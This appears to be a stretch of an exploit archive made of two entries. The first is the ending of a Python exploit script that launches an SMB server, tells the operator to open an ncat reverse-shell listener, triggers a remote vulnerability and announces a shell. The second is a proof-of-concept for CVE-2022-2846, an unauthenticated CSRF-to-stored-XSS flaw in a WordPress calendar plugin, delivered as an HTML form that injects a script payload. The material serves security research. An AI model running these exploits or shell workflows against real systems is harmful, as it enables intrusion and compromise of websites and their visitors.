    smb_server_thread = threading.Thread(target=start_smb_server, name="SMBServer", args=(args.lhost,))
    smb_server_thread.start()

    # Rev Shell reminder
    print("[!] At this point you should have spawned a rev shell listener")
    print(f"[i] 'ncat -lnvp {args.lport}' or 'rlwrap ncat -lnvp {args.lport}'")
    print("[?] Are you ready to trigger the vuln? Then press enter!")
    input()  # Wait for input then continue

    # Trigger vulnerability
    print("[*] Now triggering the vulnerability")
    trigger_vulnerability(args.target, args.lhost)

    # Exit
    print("[+] Enjoy your shell. Bye!")
    os._exit(1)


if __name__ == "__main__":
    main()
-
Calendar Event Multi View 1.4.07 - Unauthenticated Arbitrary Event Creation to Cross-Site Scripting (XSS)
# Exploit Title: Calendar Event Multi View 1.4.07 - Unauthenticated Arbitrary Event Creation to Cross-Site Scripting (XSS)
# Date: 2022-05-25
# Exploit Author: Mostafa Farzaneh
# WPScan page: https://wpscan.com/vulnerability/95f92062-08ce-478a-a2bc-6d026adf657c
# Vendor Homepage: https://wordpress.org/plugins/cp-multi-view-calendar/
# Software Link: https://downloads.wordpress.org/plugin/cp-multi-view-calendar.1.4.06.zip
# Version: 1.4.06
# Tested on: Linux
# CVE : CVE-2022-2846

# Description:
The Calendar Event Multi View WordPress plugin before 1.4.07 does not have any authorisation and CSRF checks in place when creating an event, and is also lacking sanitisation as well as escaping in some of the event fields. This could allow unauthenticated attackers to create arbitrary events and put Cross-Site Scripting payloads in them.

# POC and exploit code:
As an unauthenticated user, to add a malicious event (on October 6th, 2022) to the calendar with ID 1, open the page below in a browser:

<html>
  <body>
    <form action="https://example.com/?cpmvc_do_action=mvparse&f=datafeed&calid=1&month_index=0&method=adddetails" method="POST">
      <input type="hidden" name="Subject" value='"><script>alert(/XSS/)</script>' />
      <input type="hidden" name="colorvalue" value="#f00" />
      <input type="hidden" name="rrule" value="" />
      <input type="hidden" name="rruleType" value="" />
      <input type="hidden" name="stpartdate" value="10/6/2022" />
      <input type="hidden" name="stparttime" value="00:00" />
      <input type="hidden" name="etpartdate" value="10/6/2022" />
      <input type="hidden" name="etparttime" value="00:00" />
      <input type="hidden" name="stpartdatelast" value="10/6/2022" />
      <input type="hidden" name="etpartdatelast" value="10/6/2022" />
      <input type="hidden" name="stparttimelast" value="" />
      <input type="hidden" name="etparttimelast" value="" />
      <input type="hidden" name="IsAllDayEvent" value="1" />
      <input type="hidden" name="Location" value="CSRF" />
      <input type="hidden" name="Description" value='<p style="text-align: left;">CSRF</p>' />
      <input type="hidden" name="timezone" value="4.5" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

The XSS will be triggered when viewing the related event.